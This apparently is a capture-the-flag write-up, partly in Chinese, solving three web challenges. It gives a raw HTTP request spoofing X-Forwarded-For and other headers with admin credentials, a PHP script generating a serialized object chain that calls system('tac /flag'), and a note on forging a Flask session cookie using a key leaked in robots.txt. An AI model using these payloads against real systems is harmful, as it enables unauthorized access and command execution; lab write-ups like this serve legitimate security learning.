EzHttp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST / HTTP/1.1
Host: 1.117.175.65:23333
O2TAKUXX: GiveMeFlag
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Syclover
X-Forwarded-For: 127.0.0.1
Via: Syc.vip
Origin: http://1.117.175.65:23333
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: sycsec.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=admin&password=%40dm1N123456r00t%23

常用的请求头伪造都在这里了。

unsign

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php

highlight_file(__FILE__);

class syc
{
public $cuit;
}

class lover
{
public $yxx;
public $QW;
}

class web
{
public $eva1;
public $interesting;
}

$a = new syc();
$b = new lover();
$c = new web();

$a->cuit = $b;
$b->yxx = $c;
$c->eva1 = "system";
$c->interesting = "tac /flag";

print(urlencode(serialize($a)));

?>

you know flask?

拿到了flask的session,解密发现有一个字段标识了是否是admin;flask的session是使用密钥签名的,也就是说解密容易伪造难,伪造必须要找到密钥的,然后发现/robots.txt下有密钥内容,伪造成功。